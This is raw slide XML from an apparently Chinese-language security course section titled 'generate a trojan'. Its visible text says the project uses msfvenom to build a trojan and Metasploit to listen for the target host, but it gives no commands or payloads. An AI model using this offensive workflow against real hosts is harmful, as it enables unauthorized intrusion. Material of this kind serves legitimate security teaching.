                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6387842" y="1998939"/>
              <a:ext cx="555274" cy="387350"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【相关知识】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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11" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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a:xfrm>
            <a:off x="5590261" y="1695539"/>
            <a:ext cx="5567680" cy="1136650"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="5567680" cy="1136650"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7133311" y="2086569"/>
              <a:ext cx="5062220" cy="922020"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>      </a:t>
              </a:r>
              <a:r>
                <a:rPr dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>本项目使用msfvenom模块生成木马，并在本地利用Metasploit工具对目标主机进行监听。</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实例】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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8" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3795395" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3795395" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3129915" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用msfvenom模块生成木马的原理</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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6" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
